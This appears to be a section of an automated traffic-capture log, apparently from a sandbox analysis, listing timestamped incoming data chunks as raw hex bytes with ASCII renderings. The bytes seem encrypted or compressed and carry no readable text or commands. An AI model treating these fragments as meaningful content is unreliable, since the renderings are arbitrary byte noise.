                                                                                                                                                                                2021-11-11 11:27:09 UTC12941INData Raw: 94 16 bd 30 64 ff 5d cb dd 1e 67 32 93 a6 be c8 81 54 dd af 5f 3f 34 0a 80 fb de 3e 93 5a 11 80 43 cc 60 7a 24 71 b8 0f 0b 49 75 5f 6e d1 e0 81 16 f7 2d 4a 00 23 2b c3 94 08 0b 58 ec 33 16 62 52 a9 fd d8 0c 7f 18 5e b9 e2 d7 87 7c 40 1c 31 e9 18 bb 75 0c 24 b8 3d 96 45 8c 42 43 ac 6e 00 70 05 19 8f fb f7 8d e9 13 16 7d f9 be 73 81 96 e0 4a b5 fd b7 4c d3 b5 7b 37 e2 0f ba 82 84 47 1a d7 16 b7 43 40 72 e1 da df 4d 9f 0c ee b1 10 b5 4b cd ee 34 db 70 26 c5 26 56 12 2d e9 49 88 28 2c 04 24 2a 10 fe 5c af da 04 94 22 00 e1 7c 97 0e ff c6 81 79 f6 02 89 fc 5e c1 e6 06 c0 d3 f1 18 3c 2b 5f f6 79 03 02 c6 69 c8 83 45 01 f6 28 79 6c 08 82 12 0a 07 7f 30 79 50 53 bb 02 c5 e7 76 57 f7 db 42 4a 80 49 ee b7 72 cf 98 07 27 d8 5b 75 1a 14 56 b9 40 28 d0 fb 77 97 19 7a
                                                                                                                                                                                Data Ascii: 0d]g2T_?4>ZC`z$qIu_n-J#+X3bR^|@1u$=EBCnp}sJL{7GC@rMK4p&&V-I(,$*\"|y^<+_yiE(yl0yPSvWBJIr'[uV@(wz
                                                                                                                                                                                2021-11-11 11:27:09 UTC12957INData Raw: 8a 1a 55 48 b5 0d 0f 00 d5 59 3a b0 06 41 ca 4b 3b 42 48 8b 18 14 ac d5 18 12 37 90 b7 5c 2c 45 30 ac 24 6b ac 59 42 62 98 11 f6 08 2d fe 36 d3 13 28 a8 b8 f7 8a 27 9c 7e 66 72 75 dc c8 13 50 fe 9b 45 20 87 4a 5c a8 ed c7 95 03 08 72 7d 80 fe c5 e8 bf 3c bd 29 41 d5 51 e2 cc 7a e8 d3 3e fc e6 52 17 09 11 23 56 80 0e fc 51 f7 5c 9f 54 2b 54 24 41 54 e8 2d de f6 ce 94 37 5b ac 0e 12 b4 7d ff 3a fb 26 53 2d 5d 2d 7f 39 c3 50 6a c3 8d c2 5b 8c 53 5b bf 8f 8f 41 91 22 21 4e bf 2d 49 0a 61 4e ae ce 3a 97 bf db e4 4e bb 8f 58 4a a8 3c ac 68 09 6a 23 df 50 81 e4 d6 fb 3f 32 f4 9d d7 c0 e4 0e f9 5e db be 68 51 ff 25 8e db 8f 42 62 c9 f3 50 41 7c c8 20 d7 16 30 97 39 1c 69 e1 fe 95 d4 a6 e0 51 da a2 14 80 40 3e 0d 9b 18 cd 34 10 f4 ca fe 9b 0a 9c 96 7c 54 49 0c 01
                                                                                                                                                                                Data Ascii: UHY:AK;BH7\,E0$kYBb-6('~fruPE J\r}<)AQz>R#VQ\T+T$AT-7[}:&S-]-9Pj[S[A"!N-IaN:NXJ<hj#P?2^hQ%BbPA| 09iQ@>4|TI
                                                                                                                                                                                2021-11-11 11:27:09 UTC12973INData Raw: 01 53 95 01 1c c3 2f 37 fd 2d d3 80 78 d7 d8 2e 80 01 72 97 44 aa 98 d0 05 82 1c 4a 9b 95 11 e5 c9 0a 84 c4 2c 0b 1f 97 d4 3a 85 aa 37 01 44 8c e3 c4 81 06 84 fb ba 28 28 cf 9a 00 f2 ad bb 67 5c be 2c 14 31 8a db 20 22 53 8f 3c c1 23 e0 3d 2e bb 02 28 9c 0f 82 77 dc eb d9 04 e7 be 03 ad fb de d1 e6 14 24 3e 72 c0 44 03 80 a8 a7 7e 64 03 c7 c6 12 58 07 cf 03 20 fb d9 fc ff 52 80 cb 36 af 00 c6 2a 03 5d 4b b4 58 38 99 1d 83 09 e7 fd da 18 14 9a 5b 40 44 35 c0 a8 a7 91 f8 12 bb 00 2c ad 06 77 89 97 0e d0 ea 42 a0 b5 85 58 51 61 26 6c ae 03 9c 7f ef cd f6 76 c0 06 ed 54 50 57 7e 5c 3e 64 a9 28 60 a6 11 a3 8e 02 17 2f 34 ee 89 55 41 6e 2c b9 80 20 e5 53 9f 17 c6 05 99 4e 03 9c 2b a3 40 1c 48 10 c7 22 25 43 53 20 a5 d3 5f a6 1e 81 0a 53 12 75 be 6c 27 02 92 f8
                                                                                                                                                                                Data Ascii: S/7-x.rDJ,:7D((g\,1 "S<#=.(w$>rD~dX R6*]KX8[@D5,wBXQa&lvTPW~\>d(`/4UAn, SN+@H"%CS _Sul'
                                                                                                                                                                                2021-11-11 11:27:09 UTC12989INData Raw: da f2 8d f8 68 91 ac 71 7b bd 54 cb 56 9f d9 2c e9 12 11 77 71 50 b9 5d a4 04 33 5a bf 73 26 64 0b c8 59 4c 01 64 ae bf 5c 97 5a 01 1e e9 42 be 45 d7 f6 e1 c7 25 5b 5e d0 5d 7c 17 6f 26 e3 d1 0a 57 bb 01 08 84 17 55 02 30 f2 95 04 e0 8f bf 60 b0 fc 7a 21 d5 2e 41 09 a8 48 10 d1 b2 77 40 16 cb 70 98 88 e2 c4 b5 61 40 56 c5 5e 62 7a 4a dc 78 68 08 f2 ee fe 57 20 a5 97 1b 02 f8 46 28 e5 4b 5f af 64 39 80 b6 ba 0a 85 4b 53 ba 29 5e 2a bb 38 36 68 0b 43 39 ea 7f dc 72 72 d5 13 21 5b 88 a9 b9 a0 68 aa 35 3a 3d 2d ba d3 92 7e 1e fc ef c9 da 7e e4 de b7 ee 82 95 97 1f af 54 a2 7a 75 d6 27 d1 68 e6 e1 04 7b 49 bf 42 5f 5b ee 3e 95 af 9d d7 ea 23 3a e5 e9 e6 6e 28 0f a2 05 86 0e 50 3b 56 28 13 4b ae cf 9e d6 e6 88 a0 68 4f e4 2d c6 7d dc ee ca cf 2e 4c 82 37 17 6f
                                                                                                                                                                                Data Ascii: hq{TV,wqP]3Zs&dYLd\ZBE%[^]|o&WU0`z!.AHw@pa@V^bzJxhW F(K_d9KS)^*86hC9rr![h5:=-~~Tzu'h{IB_[>#:n(P;V(KhO-}.L7o
                                                                                                                                                                                2021-11-11 11:27:09 UTC13005INData Raw: 16 9a 21 f0 be 9c 32 f6 bd e1 1d 57 6b 88 a3 4f 0c 1f db 7f 5f 12 ef a2 08 fc 8a 19 fd 06 2b 6f 3d 5b 7b a2 50 c1 e9 ec 88 fd 3b e4 bc a7 02 f5 ce 14 db 0d 3c f6 f5 00 ed 75 ad 96 fc 0c 5e b0 c3 15 45 f4 ee 2c fa 1e 34 d5 35 0e 76 9c 04 0b f7 87 95 36 6e a6 28 8d 26 14 0c f6 e5 16 73 24 f9 22 2c 02 4b 41 05 cc 84 a6 00 8b 59 55 8b 5b a5 18 78 60 e8 72 4f ec c1 1c 76 82 38 79 93 44 a7 80 6e 5f 68 cb 0f 08 a1 91 b2 a0 97 1c 13 8d 1b 05 c1 e8 01 70 2c 12 5a d1 60 98 16 ed f8 3f e9 58 92 84 40 ab a9 4d d3 b0 6b f7 4a ff ba cc 4d ba 5b 16 2c ac 4f 13 d4 38 3c dd 04 82 04 6e 49 e8 3d 94 96 2d 17 ab a0 c0 40 ed c6 2c c4 24 86 5f af 45 a4 b4 93 0e 32 07 c6 40 22 24 2f 9e b2 a2 7a 19 4a 80 12 1c 7d 46 37 81 54 f2 f2 60 25 b9 85 60 1a 16 c4 70 57 a6 54 09 5e 17 44
                                                                                                                                                                                Data Ascii: !2WkO_+o=[{P;<u^E,45v6n(&s$",KAYU[x`rOv8yDn_hp,Z`?X@MkJM[,O8<nI=-@,$_E2@"$/zJ}F7T`%`pWT^D
                                                                                                                                                                                2021-11-11 11:27:09 UTC13021INData Raw: 95 49 38 12 1a 91 66 6c 52 05 4f be 05 3d a4 f0 ee cc 00 22 18 fa b8 32 d0 8c ff 90 a0 0b cc 63 39 a4 82 3f 94 d5 7d 45 ab 9f e8 0a ba 3b 0c c1 a1 f2 45 6f 14 de 01 1d 5d 77 e8 ca 30 31 a6 16 36 84 b6 02 97 34 7f a1 45 1b 75 24 58 e5 e0 c8 d9 12 20 74 fe a9 5e 4c f0 67 42 dc a7 97 8b d3 62 8f f0 04 88 08 26 1c 0c 82 7b 48 5e 2d fe 77 10 be 8c e7 dd e0 85 d1 93 df e9 7a 2d a9 00 ac c6 19 76 dc c9 19 5c 84 97 73 8c 9b bb 13 7d cf 2f e2 9b 07 9b 7a be 5d d0 1c fd 8b a6 07 81 c3 42 4c fb d3 01 eb c7 2a 08 17 5d af c1 56 63 5c 80 a2 9e 70 01 75 d0 e1 16 c7 23 56 b3 80 1c 53 0b 2f d5 b5 96 82 fa d3 f1 ff 1c 21 de 49 49 72 76 39 ef 44 02 74 68 94 e7 6f fd 10 6a 56 be 00 b1 3e c7 5f b8 cb d2 11 4a f8 85 4f 82 27 c2 5d 7b 50 c3 a0 4f 01 f6 b7 c2 52 11 5b cc 29 3a
                                                                                                                                                                                Data Ascii: I8flRO="2c9?}E;Eo]w0164Eu$X t^LgBb&{H^-wz-v\s}/z]BL*]Vc\pu#VS/!IIrv9DthojV>_JO']{POR[):
                                                                                                                                                                                2021-11-11 11:27:09 UTC13037INData Raw: 65 4a 6e a7 86 04 3f f9 4d f1 b6 ba 01 2e 0e 7a b8 9a a9 f2 9e 26 31 e2 b8 10 7c 16 49 26 d2 16 a0 64 32 6e 73 89 c0 0c bd d2 a2 08 62 9d f6 ed 59 58 83 71 c0 2c 87 6d 01 4c 54 ab 44 4a 69 f3 3e e8 cd 97 f3 04 09 e9 58 4c 77 4e d2 40 e3 c5 4d 84 52 c4 37 ea 1d 80 7a 35 75 3c 4f b9 04 e1 e6 65 bd a9 ba a6 80 82 07 1f fc 2b 60 7a cc 26 40 15 f0 4e 02 c8 f6 4d 20 90 2e 33 14 dc 82 c3 b1 d4 8a 3e 46 21 4c 3e 88 f6 60 5b 68 a5 28 38 51 0c e8 9f 15 15 1c 9a bc 09 23 b1 78 0d f7 44 dd 1e 0a 32 61 20 80 86 57 55 c1 18 9b 15 56 19 00 ee 6d bd 01 77 fa a8 05 58 02 09 d8 16 2b 5a f7 b0 5b 70 70 df c9 43 d3 5f 80 20 9a 9f dc 8a 44 38 cf c5 06 49 e9 fb 46 70 ce 3a 2a 0e 9f 8f 3e 9d fe a0 00 4a d7 de d4 c1 68 97 39 00 06 df b5 b1 c7 1c 72 8b 5f dc b3 64 94 e0 17 bb 4c
                                                                                                                                                                                Data Ascii: eJn?M.z&1|I&d2nsbYXq,mLTDJi>XLwN@MR7z5u<Oe+`z&@NM .3>F!L>`[h(8Q#xD2a WUVmwX+Z[ppC_ D8IFp:*>Jh9r_dL
                                                                                                                                                                                2021-11-11 11:27:09 UTC13053INData Raw: ff 3a 45 01 27 1e 3e 44 7a e0 2a c0 5c ee 57 24 6f 30 74 4c 44 dc ce 12 c8 04 ea 01 c4 ed 3c d8 f5 3c 7e 30 b9 40 74 e5 97 60 af 34 84 07 fa 87 0f 1e ee eb 54 a2 ca 0f 6a df 29 10 55 c7 f0 0c 43 e6 14 40 9a 98 bf d4 5f 45 20 e3 11 e1 e3 7c 01 0c e5 0a 98 0c af d5 e1 2a ea 34 ff c1 96 74 aa 82 18 e1 e4 8c f1 00 d4 57 31 c7 16 db 0d 32 40 3e 90 92 5b 74 d7 2a a0 e2 bc 03 7e 67 b2 c8 ca a8 0f 78 79 59 b8 f2 b4 fb a0 02 fc eb 67 3c a7 ec 80 0b fd fa 1b 10 6f 46 6c 9c d2 9b f2 4d 8b 49 74 36 41 91 31 b3 50 e8 b1 f0 fe 88 a2 7c dc e4 9c 02 00 d6 ab 9d c3 2a b2 5a 73 b3 64 dd b8 42 12 fb fc ee b6 3e 7e a8 18 ee 86 95 46 ca 2f 42 17 5c 34 da 00 c8 8e a9 72 35 c1 98 e9 da 6d 07 e5 2d 47 90 a5 f6 99 fe 3b 47 06 c6 69 45 1a 00 d6 bf 56 44 2b 4f 50 34 ea c2 58 ac e4
                                                                                                                                                                                Data Ascii: :E'>Dz*\W$o0tLD<<~0@t`4Tj)UC@_E |*4tW12@>[t*~gxyYg<oFlMIt6A1P|*ZsdB>~F/B\4r5m-G;GiEVD+OP4X
                                                                                                                                                                                2021-11-11 11:27:09 UTC13069INData Raw: c5 ec e9 5a 06 c5 4f eb ce 6a 93 a3 25 50 a3 81 28 cd 0f d1 30 b9 80 0d 45 29 f1 9d 67 a2 25 d6 54 61 5e 40 fe 38 df 13 0d 50 00 21 8d 92 06 2d 5c bc 17 43 1e dc 90 0e 32 b2 01 50 2a 7a 8d 1a c2 03 c0 5d 40 b0 49 00 bc e9 f8 88 48 e8 0d 47 bc c3 f6 21 4f ed 0a fd f2 26 f4 25 92 0f 5d 4c 5d 97 f7 13 03 34 04 3a 2d 00 c5 7e 55 6d c2 a0 e2 2d 9f 58 b2 25 43 fd f5 c0 72 c7 a3 90 94 c2 0e 55 80 48 77 11 e9 30 15 fb 1b f9 0a 18 40 85 cc 08 6f 93 d8 ca 1e 88 4b 9e e8 f6 21 a4 75 0a 1c 4a 91 fc 21 7e f7 03 d6 42 70 f9 05 e2 9f 6f 5f dd 00 8f bd 04 30 29 ce 60 cc 1c 39 ab 72 12 00 ad 11 7d 4b d6 de c2 9a 03 d2 66 33 78 19 7a 05 94 41 85 8d 1e 05 97 e7 e2 06 91 4c 97 fc 07 48 01 3e 32 84 25 15 fc be 18 a8 0b 24 ec d7 c0 68 5e a0 25 72 aa 06 2b e7 18 1a 41 20 30 f4
                                                                                                                                                                                Data Ascii: ZOj%P(0E)g%Ta^@8P!-\C2P*z]@IHG!O&%]L]4:-~Um-X%CrUHw0@oK!uJ!~Bpo_0)`9r}Kf3xzALH>2%$h^%r+A 0
                                                                                                                                                                                2021-11-11 11:27:09 UTC13085INData Raw: e7 38 05 6f d4 ea 2a 08 0c 20 89 aa 16 5d 96 2b 7c 79 24 36 46 2e 12 1e fe 01 21 de eb 9a ed 3a 46 3f cf bb 38 08 5a 9d a2 e0 12 58 00 bc c3 6d aa f9 e3 25 89 e6 52 38 28 c9 82 8a 60 99 06 b9 57 0f da 06 81 e1 d0 af ff 27 32 37 5d b6 b3 40 04 b1 e2 c1 40 0d 05 b8 d0 6b 44 08 19 10 01 a2 ef 3d f1 03 18 03 7a 9f 70 e9 cb 48 4c 20 e7 02 2b d8 da 0c ce de e2 03 f5 c5 77 c0 06 72 e5 34 56 18 7a 5e 26 82 f4 5b 70 6a 2e 9c 55 c1 09 e4 62 08 d8 8e 27 c6 08 9d 57 9c 7e 2f 49 be 73 e0 ad 56 77 e9 da 6b b7 7c e5 82 a7 26 b3 3e 12 0b 08 93 5e 5e 76 b8 89 5c c5 f5 91 72 35 b6 2f 80 95 6b 39 b7 75 55 5c af f1 2f 5e 79 d2 6b f1 a2 c0 68 1b aa ff 4f 3f ba 3c 26 d9 12 51 8f 44 bd b4 a4 eb f8 a7 be 69 fb 77 ef 3e 4b 7e 2a 40 41 ba 6f 75 b5 d4 35 56 48 4f 77 3a 77 85 28 c3
                                                                                                                                                                                Data Ascii: 8o* ]+|y$6F.!:F?8ZXm%R8(`W'27]@@kD=zpHL +wr4Vz^&[pj.Ub'W~/IsVwk|&>^^v\r5/k9uU\/^ykhO?<&QDiw>K~*@Aou5VHOw:w(
                                                                                                                                                                                2021-11-11 11:27:09 UTC13101INData Raw: 36 cf 67 a8 38 82 96 8f 22 53 01 f2 5b ec 3b c1 d0 da cb 06 24 38 51 fd a0 70 25 4b db a2 d1 20 f7 f4 b6 82 28 5e ed 77 01 9b a0 02 88 6d ce 6f 16 24 bf 6b b1 16 f5 8b 99 87 30 58 fd 48 71 5e 5e e9 cc d6 d8 3c 54 60 5c 3c 52 56 be 2e 00 f4 d5 79 53 bb a1 4a 80 7f ed 3f de 5b ca 00 04 d9 cb dd 66 5a 98 5f 80 07 5e 55 16 bd 72 c9 ef 00 03 cd bf b3 b0 3d b8 2a 02 a0 12 46 20 09 ea 40 9b f2 df 00 0c 53 d4 31 d3 5a e9 3d 5b 80 ed be 83 76 3b 7d f7 50 f9 2c 7f 37 99 04 e5 1a ae a0 aa 28 15 02 2f 7f 22 05 cd 88 eb 4e 2c 1d 7c 40 84 b0 00 48 fe aa fb 36 0d 68 ea 1d 9d 7f 5f 41 8a 04 f9 3f 53 1c 16 4f d3 01 60 6c 41 eb 6f d4 3f e8 2d 7d 1b b8 40 f4 fd c0 2c a0 e6 90 58 0b 00 d9 3a d0 1e 34 c9 cb 8b 7c 4d 00 56 02 5a 67 cc 0f 65 3d 00 6a 25 2d b7 16 80 54 0e 00 59
                                                                                                                                                                                Data Ascii: 6g8"S[;$8Qp%K (^wmo$k0XHq^^<T`\<RV.ySJ?[fZ_^Ur=*F @S1Z=[v;}P,7(/"N,|@H6h_A?SO`lAo?-}@,X:4|MVZge=j%-TY
                                                                                                                                                                                2021-11-11 11:27:09 UTC13117INData Raw: 92 00 06 e3 38 65 8e 9c 71 0b 00 2e 3c ac 1e 70 b1 7a 99 fa 4b 00 f2 6a 8f 15 fb 42 cf 3a 07 61 af fa fd ce 20 ab c1 40 6c 07 6e c0 7a 01 51 d0 f6 44 38 1a 00 20 08 ae f5 e6 59 64 a2 72 9c 00 9b b8 2f ab b3 95 30 c8 3b cd aa 07 61 91 c3 14 40 17 7a 6e 53 00 7d a6 8a 92 56 7b 0a 59 3e 21 2f 80 18 c8 e3 10 6e 35 d0 1d 85 77 98 56 d5 00 5a d3 36 43 a2 2c 01 f8 b7 6b dd 5f 83 73 25 d1 68 0f 07 d6 41 ab 7d a5 10 45 ce ec 3c ba 48 a0 18 80 2c 83 4d 56 39 f3 00 2d 82 ae 0b 73 35 5e de ea 6e 5c 4b 92 03 b9 5b 69 6b c9 b0 85 76 a8 00 3a 6f 0f 08 aa 34 b4 99 01 e0 4f db b9 d7 1d d5 d4 1b ee 0f 28 51 dd 76 00 01 12 eb 96 50 03 c5 ca f5 9c 9b ed 98 cf 31 f4 1f b4 3b 55 39 80 e7 aa 4c e0 1a 94 ba 00 57 19 ee 37 9c be 59 2b f4 06 1e 76 f4 18 c0 ea ad 35 fd 88 83 00 7c
                                                                                                                                                                                Data Ascii: 8eq.<pzKjB:a @lnzQD8 Ydr/0;a@znS}V{Y>!/n5wVZ6C,k_s%hA}E<H,MV9-s5^n\K[ikv:o4O(QvP1;U9LW7Y+v5|
                                                                                                                                                                                2021-11-11 11:27:09 UTC13133INData Raw: a8 2b 9d d6 aa 82 a2 c2 fb 49 fb 7d 6c b1 59 9f f4 5b 5e a2 de 01 2d e9 98 b7 9e 22 cd 67 fd 94 59 a0 e8 ae 14 9d de cf c0 7d 2a 86 1a 00 e4 ad 5c f6 6a c1 43 26 e2 a4 00 f2 ea 87 36 59 1a 68 23 1d 3f 7d 77 57 18 1d 63 67 7b 13 c2 b7 0c e8 7c 1d 40 3a ff 7e 85 bd 19 c1 5d 6c 1d de 4d fe 36 c4 a5 2c af e3 19 25 1a 80 a6 b9 39 3c bf b4 02 20 b1 f2 0a 2f 2d cf 76 db 65 01 bc 86 f5 84 be 02 18 e9 b5 cc f5 ec e0 27 51 54 59 1f c9 7f 4f 64 9d 7f 96 f8 01 0f fe 49 d7 6f 3b b8 a6 e5 12 04 fe d4 f5 ef f3 d0 4b a5 94 2a dd 86 2e ca ce 7b 9d c2 46 45 26 82 67 d9 fa 7f 9e b8 25 9a 4f 5f 92 4c 57 95 d2 b1 e0 d0 07 c2 d1 c0 16 50 a4 ba b7 10 e7 bd 5f 89 4d d5 c2 7c 57 76 60 6b 50 0d 80 17 e9 7b 5a a4 b4 51 49 21 89 e4 fa 7d 65 ab 0e 20 25 12 ab a3 86 25 08 81 38 cb c4
                                                                                                                                                                                Data Ascii: +I}lY[^-"gY}*\jC&6Yh#?}wWcg{|@:~]lM6,%9< /-ve'QTYOdIo;K*.{FE&g%O_LWP_M|Wv`kP{ZQI!}e %%8
                                                                                                                                                                                2021-11-11 11:27:09 UTC13141INData Raw: 00 b3 70 07 2e d4 61 0d 66 00 f9 53 9c c3 ec 6b 95 42 3d e4 ac 03 68 2d 0f be 23 88 61 ad 72 00 92 76 73 48 8e 86 9e 40 1c f7 b3 27 00 b9 79 f4 4c 68 45 1d 5a f5 7e 42 ad 43 ff 1d 6e 48 78 53 09 bb 10 67 5e 1b 62 d4 ab b1 27 2a e8 26 90 13 0d e9 1a cd 28 d4 bc 39 bd 40 54 b3 dd c1 14 e8 9c 0f ab 01 cf db 55 fb ba e3 7b e5 2b 3b 17 5b cd d8 3c f8 13 72 7b 7d ab 8a 34 d2 ff 3c 3b e9 4b e1 e1 1e 7a e2 c5 c9 ef 77 4d d7 2f c5 83 38 df b1 e2 6a 00 5e 53 bb 12 2a de 48 3f e2 4b c4 13 bf ac ec 97 e2 cb 90 18 0d e9 ea 79 7a fc 01 1e 61 0d 0c 36 fd 52 3a 88 c6 93 4a f1 f0 94 2c 25 97 02 55 cc 7f 19 cc fd 94 19 68 7f fd 7f 3d 28 10 54 05 00 90 1a b9 fa ae 3b 68 1c e0 56 74 af 46 5d 09 fe 34 bf 7f fe 0c 50 69 2d 05 de 46 41 21 cd e0 91 f5 0c a0 22 5c b2 ec eb 9d 1e
                                                                                                                                                                                Data Ascii: p.afSkB=h-#arvsH@'yLhEZ~BCnHxSg^b'*&(9@TU{+;[<r{}4<;KzwM/8j^S*H?Kyza6R:J,%Uh=(T;hVtF]4Pi-FA!"\
                                                                                                                                                                                2021-11-11 11:27:09 UTC13157INData Raw: ce 5d 74 00 e9 26 c6 15 01 7a 8e 00 9b a2 b7 e3 a9 41 dd 56 00 58 21 5f 88 79 a1 96 38 00 11 a0 1d ec da 9f 03 1c 00 a6 0a 64 3e f2 9e 1f 28 00 71 d5 b0 0b 37 36 ce a7 fe bf 00 7c 0d 4c 43 e1 be a6 05 0e ad 3b 97 a5 20 8a eb 8e 9a 15 b8 07 2c 12 e7 7c 00 38 67 ca 3b 49 6c 00 ae 0f fd 8f 70 c4 4d 2c 4b 61 a1 5f 00 86 aa e6 71 1f f5 8e 1a 80 a6 68 53 d8 48 0b 1e b4 97 fb de 3f c0 9e 9d d5 81 76 fe 00 93 2a 02 06 0e f1 3d 6e 00 44 fb 49 4c 74 d8 28 ba 00 f2 db a7 90 b0 8a 59 71 0f af 1b 0e ad 20 9f b8 48 ce 8f 00 34 23 97 ef e9 8e 80 de 00 0c c9 a4 44 58 46 1a fc 70 99 7b 87 00 a8 f6 ed 14 8a 49 0a 57 00 67 ee b7 0e 80 ac c7 dc 2d 60 40 f3 bf e4 af 42 fe 74 f8 3e 9d 57 12 58 14 26 31 78 2e 0c 91 a2 e6 5f fc 9e 68 26 c0 84 dc a4 b1 00 a7 bd 78 2d ce 85 3b 79
                                                                                                                                                                                Data Ascii: ]t&zAVX!_y8d>(q76|LC; ,|8g;IlpM,Ka_qhSH?v*=nDILt(Yq H4#DXFp{IWg-`@Bt>WX&1x._h&x-;y
                                                                                                                                                                                2021-11-11 11:27:09 UTC13173INData Raw: 8b 09 ac 2b 6e b6 5a ad 30 f9 4e 86 02 eb d0 77 34 00 db 27 ca 56 6c 63 1c ed 00 1b 82 6e c9 1d 28 af 29 00 85 f5 1a 0a c0 ee 61 be 00 9a a6 68 c1 f6 7c 52 ba 02 39 83 9b 67 f7 da 7f a1 df 79 e6 fe 7b 00 a6 e8 80 1e 67 6d bd 7a bc 32 f7 d0 06 d8 87 06 81 c0 13 d4 bf 59 c0 0e f0 a1 fc fd 79 80 c0 12 13 7c 62 16 05 97 c2 4c 8e 64 5e eb 05 68 ec b3 84 23 fa b7 47 81 c2 de fe ff 3e 7c d8 82 4a 5b fa 21 a6 35 bf 48 08 51 4c 98 0e 0a db 41 55 81 41 82 90 ef 60 0b bd 75 71 7f ad c0 cc c5 cf 17 f7 7f 3b 45 01 e4 14 ed 27 76 58 27 0f 35 ea af 26 3f 12 d5 eb 88 cc 21 7a da 5f 5f fe 20 7e 4c 44 45 4a 06 fa 35 91 ab b2 75 f3 e7 ee c4 04 68 b7 0d 2d 65 ba 24 7f ae 82 43 7f fa 23 1d cd e5 e7 af 7f 11 8c 3f cc 50 29 5e 44 fd 78 7b 07 e6 7c 15 e9 7f e0 ee b7 bb d9 c7 28
                                                                                                                                                                                Data Ascii: +nZ0Nw4'Vlcn()ah|R9gy{gmz2Yy|bLd^h#G>|J[!5HQLAUA`uq;E'vX'5&?!z__ ~LDEJ5uh-e$C#?P)^Dx{|(
                                                                                                                                                                                2021-11-11 11:27:09 UTC13189INData Raw: e7 ff b5 79 0a 8a 66 96 27 55 e5 23 a5 55 c6 e0 bd d9 e5 59 62 c5 f2 7e 27 4c 5d 03 29 2a 97 ea ce 04 84 28 66 ac 8a 05 db ac fb 7a aa cc ae 80 12 85 05 13 bc c8 c9 4c 53 39 c2 1f 3d 49 10 52 c7 e0 ba 46 e3 27 b7 7e 12 70 c2 0b 40 fa e2 04 ee ff 6a c2 15 b9 80 bb af d8 8d 14 f8 c9 e1 4c f4 e5 b2 d8 d2 5d 7e 49 2f 55 ba 8f c0 3e 5b 20 36 5f 5e 36 68 90 85 82 0a d6 65 a5 e5 37 13 35 bb 29 0b 80 f0 be f1 d9 97 7b 81 1c ee c8 db 70 0c c6 bb 03 17 df 79 83 c3 ad ce 00 04 f7 d6 50 b8 e0 f3 9f ff 6a 84 41 bf 92 3c f6 5c 07 00 7a ab 6d 08 3a 47 5a 2d fe 28 bb b1 0e ac 3c 6f 52 c3 27 22 e7 02 76 c2 0a 2c 5a f3 dd 45 1d a4 4f 04 43 47 b7 b1 73 7e c4 cf 0b 09 41 02 52 55 e0 fa 6d a0 ff 94 d7 fd 34 db 88 12 4e 7a 7f e2 4e 80 53 68 c0 28 ef 4f 3f 41 4a c3 5d e4 1c f3
                                                                                                                                                                                Data Ascii: yf'U#UYb~'L])*(fzLS9=IRF'~p@jL]~I/U>[ 6_^6he75){pyPjA<\zm:GZ-(<oR'"v,ZEOCGs~ARUm4NzNSh(O?AJ]
                                                                                                                                                                                2021-11-11 11:27:09 UTC13205INData Raw: 49 4d 4c fe f9 c0 1b 01 c5 73 ad 84 44 f0 d3 cf c8 e5 62 f3 fa b0 e0 2d 00 57 91 cb c5 66 78 c6 9d 01 16 4b 0e a2 c1 37 25 dc 40 2b 0f 57 42 06 6c 20 64 15 e2 5b 05 03 0b dc 98 99 74 c4 c0 e1 40 8d 00 78 d6 50 ad 86 0f 05 22 07 bc 4a 54 4e 0b 33 f4 9d 81 76 98 ec de 51 00 45 19 da 80 ba cb a8 62 00 d8 77 94 5c 85 2f b2 bc 00 fd 1b 7f 38 1e ac 4e 10 f2 47 00 8d b9 64 2d 6c e3 5f 01 00 02 ec fd fb c6 d6 b3 43 0f bb 4d 47 08 c0 6e 90 3d 22 ce 00 6d 66 fc 44 01 43 99 b4 3f 0e c1 00 e7 eb bf e1 4c 1e dd 73 71 00 35 03 3c f2 73 7f c7 21 00 0f 66 e4 c0 f5 b2 7c 76 00 f9 4d 5a 47 02 57 ae 72 0e fb 22 9b 21 5d 80 1e 5f d3 4e ec b2 30 37 6f 10 30 3b 41 78 20 00 5a eb 93 17 35 68 d4 b6 00 3a a5 2f b0 c3 28 dd fb 00 be ca a8 d1 da 9e 08 b5 00 c8 d5 c1 8c 7d f3 3a cd
                                                                                                                                                                                Data Ascii: IMLsDb-WfxK7%@+WBl d[t@xP"JTN3vQEbw\/8NGd-l_CMGn="mfDC?Lsq5<s!f|vMZGWr"!]_N07o0;Ax Z5h:/(}:
                                                                                                                                                                                2021-11-11 11:27:09 UTC13221INData Raw: 00 69 12 e4 60 53 fb ab d3 00 d1 f9 32 ad 08 3b 9c 4b ee c5 03 e1 c4 e9 27 16 3f f0 4d d2 c2 0e 59 dd 5a f4 20 e4 b2 54 ef 1e 39 45 01 1c e5 cb 80 f1 7e 51 71 b1 bc 00 84 10 42 cf e6 9f 0c f7 1e ee b4 a0 27 70 55 ea 3f 0f ca d0 8f 5b bd 40 15 f2 58 67 d2 c0 00 74 fe 61 a5 38 c7 23 56 09 d8 4d 27 85 80 bb f7 ae e1 19 03 4b c5 0a 2e f6 db a8 7c 95 f2 01 9b 54 0d d9 84 d1 be cc 80 91 7b 78 07 6a 59 e8 94 9f c0 6f aa 81 35 00 0b 02 15 0e 55 8e 17 6a 00 0a 08 5e 49 ee 5c d0 ed 00 f2 63 2b a5 3b fd 21 9e 00 f3 99 5a ca 6c b3 a4 2f 01 c4 d0 6b e7 a6 ad 27 e8 84 57 00 23 e5 9d 03 68 f9 6e 2c 00 2a 21 d3 df 05 eb 74 66 1c 98 ac 38 40 0e b0 12 56 3b 1a 00 2b a1 91 41 5d 25 e0 32 00 d8 d3 a8 51 aa 1b b5 80 00 26 3b bb 4d 9c 7e 3a ce 2e a5 a4 d3 12 73 00 75 ae f9 9f
                                                                                                                                                                                Data Ascii: i`S2;K'?MYZ T9E~QqB'pU?[@Xgta8#VM'K.|T{xjYo5Uj^I\c+;!Zl/k'W#hn,*!tf8@V;+A]%2Q&;M~:.su
